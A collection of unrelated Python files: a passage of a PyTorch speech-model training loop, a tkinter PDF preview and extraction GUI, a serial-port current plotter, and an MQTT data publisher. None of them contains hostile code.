arr_snt_len_lab,
data_set_inp,
data_set_ref,
use_cuda,
)
if to_do == "train":
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
ref,
inp_out_dict,
max_len_fea,
max_len_lab,
batch_size,
to_do,
forward_outs,
)
_optimization_step(optimizers, outs_dict, config, arch_dict)
else:
with torch.no_grad():
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
ref,
inp_out_dict,
max_len_fea,
max_len_lab,
batch_size,
to_do,
forward_outs,
)
if to_do == "forward":
for out_id in range(len(forward_outs)):
out_save = outs_dict[forward_outs[out_id]].data.cpu().numpy()
if forward_normalize_post[out_id]:
counts = load_counts(forward_count_files[out_id])
out_save = out_save - np.log(counts / np.sum(counts))
write_mat(output_folder, post_file[forward_outs[out_id]], out_save, data_name[i])
else:
loss_sum = loss_sum + outs_dict["loss_final"].detach()
err_sum = err_sum + outs_dict["err_final"].detach()
beg_batch = end_batch
end_batch = beg_batch + batch_size
_update_progress_bar(to_do, i, N_batches, loss_sum)
elapsed_time_chunk = time.time() - start_time
loss_tot = loss_sum / N_batches
err_tot = err_sum / N_batches
del inp, ref, outs_dict, data_set_inp_dim, data_set_ref_dim
_save_model(to_do, nns, multi_gpu, optimizers, info_file, arch_dict)
if to_do == "forward":
for out_name in forward_outs:
post_file[out_name].close()
_write_info_file(info_file, to_do, loss_tot, err_tot, elapsed_time_chunk)
if not data_loading_process is None:
data_loading_process.join()
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set_dict = extract_data_from_shared_list(
shared_list
)
data_set_inp, data_set_ref = convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda)
data_set = {"input": data_set_inp, "ref": data_set_ref}
data_end_index = {"fea": data_end_index_fea, "lab": data_end_index_lab}
return [data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict]
else:
return [None, None, None, None, None, None]
def count_parameters(model):
table = PrettyTable(["Modules", "Parameters"])
total_params = 0
for name, parameter in model.named_parameters():
if not parameter.requires_grad: continue
param = parameter.numel()
table.add_row([name, param])
total_params+=param
print(table)
print(f"Total Trainable Params: {total_params}")
return total_params
def run_nn(
data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict, cfg_file, processed_first, next_config_file
):
# This function processes the current chunk using the information in cfg_file. In parallel, the next chunk is load into the CPU memory
# Reading chunk-specific cfg file (first argument-mandatory file)
if not (os.path.exists(cfg_file)):
sys.stderr.write("ERROR: The config file %s does not exist!\n" % (cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
# Setting torch seed
seed = int(config["exp"]["seed"])
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
# Reading config parameters
output_folder = config["exp"]["out_folder"]
use_cuda = strtobool(config["exp"]["use_cuda"])
multi_gpu = strtobool(config["exp"]["multi_gpu"])
to_do = config["exp"]["to_do"]
info_file = config["exp"]["out_info"]
model = config["model"]["model"].split("\n")
forward_outs = config["forward"]["forward_out"].split(",")
forward_normalize_post = list(map(strtobool, config["forward"]["normalize_posteriors"].split(",")))
forward_count_files = config["forward"]["normalize_with_counts_from"].split(",")
require_decodings = list(map(strtobool, config["forward"]["require_decoding"].split(",")))
use_cuda = strtobool(config["exp"]["use_cuda"])
save_gpumem = strtobool(config["exp"]["save_gpumem"])
is_production = strtobool(config["exp"]["production"])
if to_do == "train":
batch_size = int(config["batches"]["batch_size_train"])
if to_do == "valid":
batch_size = int(config["batches"]["batch_size_valid"])
if to_do == "forward":
batch_size = 1
# ***** Reading the Data********
if processed_first:
# Reading all the features and labels for this chunk
shared_list = []
p = threading.Thread(target=read_lab_fea, args=(cfg_file, is_production, shared_list, output_folder))
p.start()
p.join()
data_name = shared_list[0]
data_end_index = shared_list[1]
fea_dict = shared_list[2]
lab_dict = shared_list[3]
arch_dict = shared_list[4]
data_set = shared_list[5]
# print('*************')
# print(len(data_name), len(data_set), len(data_end_index), len(fea_dict), len(lab_dict), len(arch_dict))
# print('*************')
# converting numpy tensors into pytorch tensors and put them on GPUs if specified
if not (save_gpumem) and use_cuda:
data_set = torch.from_numpy(data_set).float().cuda()
else:
data_set = torch.from_numpy(data_set).float()
# Reading all the features and labels for the next chunk
shared_list = []
p = threading.Thread(target=read_lab_fea, args=(next_config_file, is_production, shared_list, output_folder))
p.start()
# Reading model and initialize networks
inp_out_dict = fea_dict
# print(inp_out_dict, len(inp_out_dict))
[nns, costs] = model_init(inp_out_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do)
# print(nns)
# cop=0
# for net in nns.keys():
# cop+=count_parameters(nns[net])
# # summary(nns[net], (-1, 52))
# print(cop)
# optimizers initialization
optimizers = optimizer_init(nns, config, arch_dict)
# pre-training and multi-gpu init
for net in nns.keys():
pt_file_arch = config[arch_dict[net][0]]["arch_pretrain_file"]
if pt_file_arch != "none":
if use_cuda:
checkpoint_load = torch.load(pt_file_arch)
else:
checkpoint_load = torch.load(pt_file_arch, map_location="cpu")
nns[net].load_state_dict(checkpoint_load["model_par"])
optimizers[net].load_state_dict(checkpoint_load["optimizer_par"])
optimizers[net].param_groups[0]["lr"] = float(
config[arch_dict[net][0]]["arch_lr"]
) # loading lr of the cfg file for pt
if multi_gpu:
nns[net] = torch.nn.DataParallel(nns[net])
if to_do == "forward":
post_file = {}
for out_id in range(len(forward_outs)):
if require_decodings[out_id]:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + "_to_decode.ark")
else:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + ".ark")
post_file[forward_outs[out_id]] = open_or_fd(out_file, output_folder, "wb")
# check automatically if the model is sequential
seq_model = is_sequential_dict(config, arch_dict)
# ***** Minibatch Processing loop********
if seq_model or to_do == "forward":
N_snt = len(data_name)
N_batches = int(N_snt / batch_size)
else:
N_ex_tr = data_set.shape[0]
N_batches = int(N_ex_tr / batch_size)
beg_batch = 0
end_batch = batch_size
snt_index = 0
beg_snt = 0
start_time = time.time()
# array of sentence lengths
arr_snt_len = shift(shift(data_end_index, -1, 0) - data_end_index, 1, 0)
arr_snt_len[0] = data_end_index[0]
loss_sum = 0
err_sum = 0
inp_dim = data_set.shape[1]
for i in range(N_batches):
max_len = 0
if seq_model:
max_len = int(max(arr_snt_len[snt_index : snt_index + batch_size]))
inp = torch.zeros(max_len, batch_size, inp_dim).contiguous()
for k in range(batch_size):
snt_len = data_end_index[snt_index] - beg_snt
N_zeros = max_len - snt_len
# Appending a random number of initial zeros, tge others are at the end.
N_zeros_left = random.randint(0, N_zeros)
# randomizing could have a regularization effect
inp[N_zeros_left : N_zeros_left + snt_len, k, :] = data_set[beg_snt : beg_snt + snt_len, :]
beg_snt = data_end_index[snt_index]
snt_index = snt_index + 1
else:
# features and labels for batch i
if to_do != "forward":
inp = data_set[beg_batch:end_batch, :].contiguous()
else:
snt_len = data_end_index[snt_index] - beg_snt
inp = data_set[beg_snt : beg_snt + snt_len, :].contiguous()
beg_snt = data_end_index[snt_index]
snt_index = snt_index + 1
# use cuda
if use_cuda:
inp = inp.cuda()
if to_do == "train":
# Forward input, with autograd graph active
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
inp_out_dict,
max_len,
batch_size,
to_do,
forward_outs,
)
for opt in optimizers.keys():
optimizers[opt].zero_grad()
outs_dict["loss_final"].backward()
# Gradient Clipping (th 0.1)
# for net in nns.keys():
# torch.nn.utils.clip_grad_norm_(nns[net].parameters(), 0.1)
for opt in optimizers.keys():
if not (strtobool(config[arch_dict[opt][0]]["arch_freeze"])):
optimizers[opt].step()
else:
with torch.no_grad(): # Forward input without autograd graph (save memory)
outs_dict = forward_model(
fea_dict,
lab_dict,
arch_dict,
model,
nns,
costs,
inp,
inp_out_dict,
max_len,
batch_size,
to_do,
forward_outs,
)
if to_do == "forward":
for out_id in range(len(forward_outs)):
out_save = outs_dict[forward_outs[out_id]].data.cpu().numpy()
if forward_normalize_post[out_id]:
# read the config file
counts = load_counts(forward_count_files[out_id])
out_save = out_save - np.log(counts / np.sum(counts))
# save the output
write_mat(output_folder, post_file[forward_outs[out_id]], out_save, data_name[i])
else:
loss_sum = loss_sum + outs_dict["loss_final"].detach()
err_sum = err_sum + outs_dict["err_final"].detach()
# update it to the next batch
beg_batch = end_batch
end_batch = beg_batch + batch_size
# Progress bar
if to_do == "train":
status_string = (
"Training | (Batch "
+ str(i + 1)
+ "/"
+ str(N_batches)
+ ")"
+ " | L:"
+ str(round(loss_sum.cpu().item() / (i + 1), 3))
)
if i == N_batches - 1:
status_string = "Training | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "valid":
status_string = "Validating | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "forward":
status_string = "Forwarding | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
progress(i, N_batches, status=status_string)
elapsed_time_chunk = time.time() - start_time
loss_tot = loss_sum / N_batches
err_tot = err_sum / N_batches
# clearing memory
del inp, outs_dict, data_set
# save the model
if to_do == "train":
for net in nns.keys():
checkpoint = {}
if multi_gpu:
checkpoint["model_par"] = nns[net].module.state_dict()
else:
checkpoint["model_par"] = nns[net].state_dict()
checkpoint["optimizer_par"] = optimizers[net].state_dict()
out_file = info_file.replace(".info", "_" + arch_dict[net][0] + ".pkl")
torch.save(checkpoint, out_file)
if to_do == "forward":
for out_name in forward_outs:
post_file[out_name].close()
# Write info file
with open(info_file, "w") as text_file:
text_file.write("[results]\n")
if to_do != "forward":
text_file.write("loss=%s\n" % loss_tot.cpu().numpy())
text_file.write("err=%s\n" % err_tot.cpu().numpy())
text_file.write("elapsed_time_chunk=%f\n" % elapsed_time_chunk)
text_file.close()
# Getting the data for the next chunk (read in parallel)
p.join()
data_name = shared_list[0]
data_end_index = shared_list[1]
fea_dict = shared_list[2]
lab_dict = shared_list[3]
arch_dict = shared_list[4]
data_set = shared_list[5]
# converting numpy tensors into pytorch tensors and put them on GPUs if specified
if not (save_gpumem) and use_cuda:
data_set = torch.from_numpy(data_set).float().cuda()
else:
data_set = torch.from_numpy(data_set).float()
#reset gpu memory
torch.cuda.empty_cache()
return [data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict]
|
extract_pdf.py
|
from download.spiders import download_pdfs
from utils import constants
from gui import scroll_frame
from extraction import adobe_json
import fitz, logging, multiprocessing
from tkinter import *
from tkinter import font, filedialog, messagebox
from tkinter.ttk import Progressbar
from functools import partial
class ExtractPDF(Frame):
def __init__(self, master=None):
"""Create a subclass of Frame for our window element. Initialize and set
the variable defaults."""
Frame.__init__(self, master)
self.master = master
self.myfont = font.Font(family="Ubuntu", size=16)
self.zoom_on = False
self.init_window()
def init_window(self):
"""Construct the layout of the window element."""
# Create PanedWindow for split layout.
self.pw = PanedWindow(self.master, sashrelief="raised", sashwidth=10)
# Extraction options frame (left side) to hold all options.
self.extract_options = Frame(self.pw)
# Scrapy options. (Download/Scrape PDF Files)
self.scrapy_download = Frame(self.extract_options, relief="groove", borderwidth=2, padx=10, pady=10)
self.scrapy_download_top = Frame(self.scrapy_download)
self.scrapy_download_top.pack(fill="both", expand=1)
self.scrapy_download_middle = Frame(self.scrapy_download)
self.scrapy_download_middle.pack(fill="both", expand=1)
self.scrapy_download_left = Frame(self.scrapy_download_middle)
self.scrapy_download_left.pack(side="left", fill="both")
self.scrapy_download_right = Frame(self.scrapy_download_middle)
self.scrapy_download_right.pack(side="right", fill="both")
self.scrapy_download_bottom = Frame(self.scrapy_download)
self.scrapy_download_bottom.pack(fill="both", expand=1)
self.scrapy_download_lbl = Label(self.scrapy_download_top, text="Scrape PDF Files From Website.")
self.scrapy_download_lbl.pack(side="left", fill="x")
self.scrapy_download_url_ent_val = StringVar()
self.scrapy_download_url_ent_lbl = Label(self.scrapy_download_left, text="Enter a URL, e.g. https://example.com/")
self.scrapy_download_url_ent_lbl.pack(fill="x")
self.scrapy_download_url_ent = Entry(self.scrapy_download_left, width=40, textvariable=self.scrapy_download_url_ent_val)
self.scrapy_download_url_ent.pack(fill="x", expand=1)
self.scrapy_download_domain_ent_val = StringVar()
self.scrapy_download_domain_ent_lbl = Label(self.scrapy_download_right, text="Enter a domain, e.g. example.com/")
self.scrapy_download_domain_ent_lbl.pack(fill="x")
self.scrapy_download_domain_ent = Entry(self.scrapy_download_right, width=40, textvariable=self.scrapy_download_domain_ent_val)
self.scrapy_download_domain_ent.pack(fill="x", expand=1)
self.scrapy_download_progress_bar = Progressbar(self.scrapy_download_bottom, mode="indeterminate")
self.scrapy_download_progress_bar.pack(fill="x", expand=1)
self.scrapy_download_btn = Button(self.scrapy_download_bottom, text="Start Crawler", width=20, command=self.start_crawler)
self.scrapy_download_btn.pack(fill="x", expand=1)
self.scrapy_download.pack(fill="both")
# Adobe API options.
self.adobe_api = Frame(self.extract_options, relief="groove", borderwidth=2, padx=10, pady=10)
self.adobe_api_top = Frame(self.adobe_api)
self.adobe_api_top.pack(fill="both", expand=1)
self.adobe_api_middle = Frame(self.adobe_api)
self.adobe_api_middle.pack(fill="both", expand=1)
self.adobe_api_bottom = Frame(self.adobe_api)
self.adobe_api_bottom.pack(fill="both", expand=1)
self.adobe_api_left = Frame(self.adobe_api_middle)
self.adobe_api_left.pack(side="left", fill="both")
self.adobe_api_right = Frame(self.adobe_api_middle)
self.adobe_api_right.pack(side="right", fill="both")
self.adobe_api_lbl = Label(self.adobe_api_top, text="Adobe PDF Extract API")
self.adobe_api_lbl.pack(side="left", fill="x")
self.adobe_api_ent_multi_val = StringVar()
self.adobe_api_ent_multi = Entry(self.adobe_api_left, width=60, textvariable=self.adobe_api_ent_multi_val)
self.adobe_api_ent_multi.pack(fill="x", expand=1)
self.adobe_api_btn_multi = Button(self.adobe_api_right, text="Select Folder",width=20, command=self.adobe_browse_folder)
self.adobe_api_btn_multi.pack(fill="x")
self.adobe_api_ent_single_val = StringVar()
self.adobe_api_ent_single = Entry(self.adobe_api_left, width=60, textvariable=self.adobe_api_ent_single_val)
self.adobe_api_ent_single.pack(fill="x", expand=1)
self.adobe_api_btn_single = Button(self.adobe_api_right, text="Select File",width=20, command=self.adobe_browse_file)
self.adobe_api_btn_single.pack(fill="x")
self.adobe_api_progress_bar = Progressbar(self.adobe_api_bottom, mode="indeterminate")
self.adobe_api_progress_bar.pack(fill="x", expand=1)
self.adobe_api_btn_send = Button(self.adobe_api_bottom, text="Send Request(s)", command=self.generate_adobe_request)
self.adobe_api_btn_send.pack(fill="x", expand=1)
self.adobe_api.pack(fill="both")
# PyMuPDF/OCR options. (Auto Extraction)
self.auto_extract = Frame(self.extract_options, relief="groove", borderwidth=2, padx=10, pady=10)
self.auto_some_text = Label(self.auto_extract, text="Auto Content Extraction.")
self.auto_some_text.pack(fill="x", expand=1)
self.auto_extract.pack(fill="both", expand=1)
# PyMuPDF/OCR options. (Manual Extraction)
self.manual_extract = Frame(self.extract_options, relief="groove", borderwidth=2, padx=10, pady=10)
self.manual_some_text = Label(self.manual_extract, text="Manual Content Extraction.")
self.manual_some_text.pack(fill="x", expand=1)
self.manual_extract.pack(fill="both", expand=1)
# PDF preview area (right side) with controls for navigation, zoom, etc
# at the top and the scrollable PDF preview below.
self.preview_area = Frame(self.pw)
# Controls for navigation, zoom, etc.
self.top_bar = Frame(self.preview_area, relief="groove", borderwidth=2, padx=10, pady=10)
self.open_btn = Button(self.top_bar, text="Open", command=self.open_extract)
self.open_btn.pack(side="left", padx=0, pady=0)
self.next_btn = Button(self.top_bar, text="Next", state="disabled", command=self.next_page)
self.next_btn.pack(side="left", padx=0, pady=0)
self.prev_btn = Button(self.top_bar, text="Prev", state="disabled", command=self.prev_page)
self.prev_btn.pack(side="left", padx=0, pady=0)
self.zoom_btn = Button(self.top_bar, text="Zoom", state="disabled", command=self.toggle_zoom)
self.zoom_btn.pack(side="left", padx=0, pady=0)
self.top_bar.pack(side="top", fill="x")
# Scrollable PDF preview area.
self.pdf_preview = scroll_frame.ScrollFrame(self.preview_area)
self.pdf_page_img = Label(self.pdf_preview.view_port, text="Open a PDF to view or manually extract content.", image=None, pady=150)
self.pdf_page_img.pack(side="left", fill="both", expand=1)
self.pdf_preview.pack(side="bottom", fill="both", expand=1)
# Add the Extraction and Preview areas to the PanedWindow.
self.pw.add(self.extract_options)
self.pw.add(self.preview_area)
self.pw.pack(fill="both", expand=True)
# ------------------------------------------------------------------------------
# Open the PDF file to view/edit/extract from.
# ------------------------------------------------------------------------------
def open_extract(self):
"""Open a file dialog and ask for an input file for the previewer to load
and display."""
self.fname = filedialog.askopenfile(
title="PDF Toolbox Document Browser",
initialdir=constants.pdf_dir,
filetypes=(
("PDF Files", "*.pdf"),
("XPS Files", "*.*xps"),
("Epub Files", "*.epub"),
("Fiction Books", "*.fb2"),
("Comic Books", "*.cbz"),
("HTML", "*.htm*")
)
)
if not self.fname:
messagebox.showerror(title="Cancelling.", message="No file chosen.")
return
self.doc = fitz.open(self.fname)
self.page_count = len(self.doc)
# Allocate storage for page display lists.
self.dlist_tab = [None] * self.page_count
self.max_width = self.pdf_preview.winfo_screenwidth() - 20
self.max_height = self.pdf_preview.winfo_screenheight() - 150
self.max_size = (self.max_width, self.max_height)
self.cur_page = 0
# If zoom is on, display twice as large.
if self.zoom_on == False:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.max_size
)
elif self.zoom_on == True:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.zoom_max_size
)
self.pdf_page_data = PhotoImage(data=self.data)
self.pdf_page_img.configure(image=self.pdf_page_data, text=None)
# Set button states to normal after file has been loaded.
self.next_btn.configure(state="normal")
self.prev_btn.configure(state="normal")
self.zoom_btn.configure(state="normal")
# ------------------------------------------------------------------------------
# Read the page data.
# ------------------------------------------------------------------------------
def get_page(self, pno, max_size=None):
"""Return a tkinter.PhotoImage or a PNG image for a document page number.
:arg int pno: 0-based page number
:arg max_size: (width, height) of available image area"""
# Get display list of page number.
self.dlist = self.dlist_tab[pno]
# Create if not yet there.
if not self.dlist:
self.dlist_tab[pno] = self.doc[pno].get_displaylist()
self.dlist = self.dlist_tab[pno]
# The page rectangle.
self.r = self.dlist.rect
self.clip = self.r
# Ensure image fits screen: exploit, but do not exceed width or height.
self.zoom_0 = 1
if max_size:
self.zoom_0 = min(1, max_size[0] / self.r.width, max_size[1] / self.r.height)
if self.zoom_0 == 1:
self.zoom_0 = min(max_size[0] / self.r.width, max_size[1] / self.r.height)
self.mat_0 = fitz.Matrix(self.zoom_0, self.zoom_0)
self.pix = self.dlist.get_pixmap(matrix=self.mat_0, alpha=False)
# Make PPM image from pixmap for tkinter.
self.img = self.pix.tobytes("ppm")
# Return image and clip position.
return self.img, self.clip.tl
def next_page(self):
"""When called, load the next PDF page."""
self.cur_page += 1
# Sanitize page number and wrap around.
while self.cur_page >= self.page_count:
self.cur_page -= self.page_count
# Pages < 0 are valid but look bad.
while self.cur_page < 0:
self.cur_page += self.page_count
if self.zoom_on == False:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.max_size
)
elif self.zoom_on == True:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.zoom_max_size
)
self.pdf_page_data = PhotoImage(data=self.data)
self.pdf_page_img.configure(image=self.pdf_page_data, text=None)
def prev_page(self):
"""When called, load the previous PDF page."""
self.cur_page -= 1
# Sanitize page number and wrap around.
while self.cur_page >= self.page_count:
self.cur_page -= self.page_count
# Pages < 0 are valid but look bad.
while self.cur_page < 0:
self.cur_page += self.page_count
if self.zoom_on == False:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.max_size
)
elif self.zoom_on == True:
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.zoom_max_size
)
self.pdf_page_data = PhotoImage(data=self.data)
self.pdf_page_img.configure(image=self.pdf_page_data, text=None)
def toggle_zoom(self):
"""Toggle zoom on or off. When zoomed pages a displayed at twice their
normal size."""
if self.zoom_on == False:
self.zoom_on = True
self.zoom_width = self.max_width * 2
self.zoom_height = self.max_height * 2
self.zoom_max_size = (self.zoom_width, self.zoom_height)
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.zoom_max_size
)
elif self.zoom_on == True:
self.zoom_on = False
self.data, self.clip_pos = self.get_page(
self.cur_page,
max_size=self.max_size
)
self.pdf_page_data = PhotoImage(data=self.data)
self.pdf_page_img.configure(image=self.pdf_page_data, text=None)
def adobe_browse_folder(self):
"""Browse for a folder and set the Entry field to the chosen folder."""
pdf_dir = filedialog.askdirectory(title="PDF Toolbox Document Browser", initialdir=constants.src_dir)
self.adobe_api_ent_multi_val.set(pdf_dir)
self.adobe_api_ent_single_val.set("")
def adobe_browse_file(self):
"""Browse for a file and set the Entry field to the chosen file."""
pdf_file = filedialog.askopenfilename(
title="PDF Toolbox Document Browser",
initialdir=constants.src_dir,
filetypes=(
("PDF Files", "*.pdf"),
("XPS Files", "*.*xps"),
("Epub Files", "*.epub"),
("Fiction Books", "*.fb2"),
("Comic Books", "*.cbz"),
("HTML", "*.htm*")
)
)
self.adobe_api_ent_single_val.set(pdf_file)
self.adobe_api_ent_multi_val.set("")
def generate_adobe_request(self):
"""Use multiprocessing to create Adobe API request."""
if self.adobe_api_ent_multi_val.get() == "" and self.adobe_api_ent_single_val.get() == "":
return
if self.adobe_api_ent_multi_val.get() == "":
self.send_adobe_request = partial(adobe_json.extract_pdf_adobe, source_path=self.adobe_api_ent_single_val.get())
self.adobe_process = multiprocessing.Process(target=self.send_adobe_request)
self.adobe_process.start()
self.adobe_api_progress_bar.start()
self.after(80, self.check_process, self.adobe_process, self.adobe_api_progress_bar)
# adobe_process.join()
elif self.adobe_api_ent_single_val.get() == "":
self.send_adobe_request = partial(adobe_json.extract_pdf_adobe, source_path=self.adobe_api_ent_multi_val.get())
self.adobe_process = multiprocessing.Process(target=self.send_adobe_request)
self.adobe_process.start()
self.after(80, self.check_process, self.adobe_process, self.adobe_api_progress_bar)
def start_crawler(self):
"""Use multiprocessing to start the crawler."""
if self.scrapy_download_domain_ent_val.get == "" or self.scrapy_download_url_ent_val.get() == "":
return
self.crawler_partial = partial(download_pdfs.run_spider, start_url=self.scrapy_download_url_ent_val.get(), allowed_domain=self.scrapy_download_domain_ent_val.get())
self.crawler_process = multiprocessing.Process(target=self.crawler_partial)
self.crawler_process.start()
self.scrapy_download_progress_bar.start()
self.after(80, self.check_process, self.crawler_process, self.scrapy_download_progress_bar)
def check_process(self, process, progress_bar):
"""Checks if process has finished, if it has then it joins the process
and stops the progress bar."""
if (process.is_alive()):
self.after(80, self.check_process, process, progress_bar)
return
else:
try:
process.join()
progress_bar.stop()
logging.info("Process complete, exiting.")
except:
logging.exception("ERROR: Unable to stop process.")
# ------------------------------------------------------------------------------
# Run standalone.
# ------------------------------------------------------------------------------
# mainwindow = Tk()
# preview = ExtractPDF(mainwindow)
# preview.mainloop()
|
measure.py
|
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import re
import signal
import sys
import threading
import serial
from time import gmtime
from time import strftime
signal.signal(signal.SIGINT, lambda sig, frame: plt.close('all'))
readed_line_regex = re.compile('^(?P<time>[0-9.]+?) (?P<current>[0-9.]+?)( (?P<power>[0-9.]+?))?[\t\s\n]+$')
class TailSerial():
def __init__(self, serial, callback_line=sys.stdout.write):
self.serial = serial
self.callback_line = callback_line
def follow(self):
while True:
line = self.serial.readline()
try:
self.callback_line(line.decode("utf-8"))
except ValueError:
pass
class ElectricalCurrentChart():
def __init__(self, subplot=111):
figure = plt.figure(figsize=(12, 6), facecolor='#DEDEDE')
self.ax = figure.add_subplot(subplot)
self.time_data = []
self.current_data = []
self.power_data = []
self.reads = 0
self.milisseconds_at_begin = 0
self.max_current = 0
self.aggregated_current = 0
self.aggregated_power = 0
self.setup()
def append_data(self, milliseconds, current, power):
print([milliseconds, current, power])
self.reads += 1
if len(self.time_data) == 0:
self.milisseconds_at_begin = milliseconds
# Prevents to plot more than two repeated values
if len(self.power_data) >= 2:
if (current == self.power_data[-1] and self.power_data[-1] == self.power_data[-2]):
self.current_data.pop()
self.time_data.pop()
self.power_data.pop()
self.time_data.append(milliseconds - self.milisseconds_at_begin)
self.current_data.append(current)
self.power_data.append(power)
self.aggregated_power += power
self.aggregated_current += current
if (current > self.max_current):
self.max_current = current
def setup(self):
plt.cla()
self.ax.set_facecolor('#DEDEDE')
self.ax.set_xlabel('Milliseconds')
self.ax.set_ylabel('Current (mA)')
self.ax.set_title('Consumption\n')
def plot(self):
# Plot once each 100 reads
if (self.reads == 0 or self.reads % 100 != 0):
return
self.setup()
x_last = self.time_data[-1]
y_last = self.current_data[-1]
self.ax.plot(self.time_data, self.current_data)
self.ax.text(x_last, y_last, "{} mA".format(y_last))
self.ax.scatter(x_last, y_last)
avg_current = self.aggregated_current/len(self.current_data)
avg_power = self.aggregated_power/len(self.power_data)
mWh = avg_power*(self.time_data[-1] - self.milisseconds_at_begin)/(3.6*10**6)
mAh = avg_current*(self.time_data[-1] - self.milisseconds_at_begin)/(3.6*10**6)
time_recording = strftime("%H:%M:%S", gmtime((self.time_data[-1] - self.milisseconds_at_begin)/1000))
label = f"Reads: {self.reads}\n"
label += f"Time recording: {time_recording}\n"
label += f"Avg current: {'{:.4f}'.format(round(avg_current, 4))} mA\n"
label += f"Max current: {'{:.4f}'.format(round(self.max_current, 4))} mA\n"
label += f"Consumption: {'{:.4f}'.format(round(mAh, 4))} mAh\n"
label += f"Avg Power: {'{:.4f}'.format(round(avg_power, 4))} mW\n"
label += f"Power: {'{:.4f}'.format(round(mWh, 4))} mWh"
plt.legend(handles=[mpatches.Patch(label=label)], loc="upper right")
plt.draw()
def append_line_in_chart(chart, line):
matches = readed_line_regex.match(line)
if not (matches):
return
chart.append_data(
int(matches.group('time')),
float(matches.group('current')),
float(matches.group('power'))
)
chart.plot()
def observe_serial(port, baudrate, on_new_line):
serial_port = serial.Serial(port, baudrate)
serial_port.close()
serial_port.open()
tail_serial = TailSerial(serial_port, on_new_line)
serial_follow = threading.Thread(target=lambda x: tail_serial.follow(), args=(1,))
serial_follow.setDaemon(True)
serial_follow.start()
if __name__ == "__main__":
if (len(sys.argv) <= 1):
print("\033[91m [FAIL] Missing serial port")
sys.exit(-1)
if (len(sys.argv) <= 2):
print(f"\033[91m [FAIL] Missing baudrate for port \"`{sys.argv[1]}`\"")
sys.exit(-1)
chart = ElectricalCurrentChart()
observe_serial(
sys.argv[1],
sys.argv[2],
lambda line: append_line_in_chart(chart, line))
plt.show()
sys.exit(0)
|
apiConnector.py
|
"""
Created on Mär 18 10:31 2019
@author: nishit
"""
import datetime
import time
import json
import threading
from abc import abstractmethod
from queue import Queue
from random import randrange
import requests
from senml import senml
from IO.MQTTClient import MQTTClient
from utils_intern.messageLogger import MessageLogger
logger = MessageLogger.get_logger_parent()
class ApiConnector:
def __init__(self, url, config, house, name):
logger.info(":")
self.buffer = None
self.config = config
self.pub_prefix = config.get("IO", "pub.topic.prefix") + str(house) + "/"
self.name = name
self.url = url
self.q = Queue()
logger.info(url)
self.mqtt_client = self.init_mqtt()
self.topic = config.get(house, "url.topic", fallback=None)
self.topic = self.pub_prefix + self.topic
self.publish_freq = int(config.get(house, "pub.freq", fallback=600))
self.data_thread = threading.Thread(target=self.fetch_data, args=(self.q, 23, 30))
self.data_thread.start()
self.publish_thread = threading.Thread(target=self.publish_data, args=(self.q, self.publish_freq))
self.publish_thread.start()
def fetch_data_api(self):
try:
logger.debug(self.url)
data = requests.get(self.url)
if data:
data = data.json()
return data
else:
return None
except Exception as e:
logger.error(str(e))
return None
@abstractmethod
def update_url(self):
pass
@abstractmethod
def extract_data(self, raw_data):
pass
def init_mqtt(self):
try:
if "pub.mqtt.host" in dict(self.config.items("IO")):
host = self.config.get("IO", "pub.mqtt.host")
else:
host = self.config.get("IO", "mqtt.host")
port = self.config.get("IO", "mqtt.port")
client_id = "client_publish" + str(randrange(100000)) + str(time.time()).replace(".", "")
mqtt = MQTTClient(str(host), port, client_id,
username=self.config.get("IO", "mqtt.username", fallback=None),
password=self.config.get("IO", "mqtt.password", fallback=None),
ca_cert_path=self.config.get("IO", "mqtt.ca.cert.path", fallback=None),
set_insecure=bool(self.config.get("IO", "mqtt.insecure.flag", fallback=False)))
return mqtt
except Exception as e:
logger.error(e)
raise e
def to_senml(self, t, v, u, n):
meas = senml.SenMLMeasurement()
meas.time = int(t)
meas.value = v
meas.unit = u
meas.name = n
return meas
def get_delay_time(self, hour, min):
date = datetime.datetime.now()
requestedTime = datetime.datetime(date.year, date.month, date.day, hour, min, 0)
if requestedTime < date:
requestedTime = requestedTime + datetime.timedelta(days=1)
return requestedTime.timestamp() - date.timestamp()
def fetch_data(self, q, hr, min):
"""Data fetch thread. Runs at 22:30 every day"""
while True:
try:
self.update_url()
data = self.fetch_data_api()
if data is not None:
data_list = self.extract_data(data)
meas_list = []
for row in data_list:
meas = self.to_senml(row[0], row[1], row[2], self.name)
meas_list.append(meas)
logger.info("length of data = "+str(len(meas_list)))
doc = senml.SenMLDocument(meas_list)
json_data = doc.to_json()
json_data = json.dumps(json_data)
q.put(json_data)
delay = self.get_delay_time(hr, min)
time.sleep(delay)
except Exception as e:
logger.error(e)
time.sleep(10)
def publish_data(self, q, frequency):
while True:
start_time = time.time()
try:
if not q.empty():
data = q.get()
self.buffer = data
q.task_done()
except Exception as e:
logger.error("q read error "+ str(e))
time.sleep(10)
try:
if self.buffer:
self.mqtt_client.publish(topic=self.topic, message=self.buffer, waitForAck=True, qos=1)
logger.debug("Results published on this topic: " + self.topic)
delay_time = frequency - (time.time() - start_time)
if delay_time > 0:
time.sleep(delay_time)
except Exception as e:
logger.error("Error pub data "+str(e))
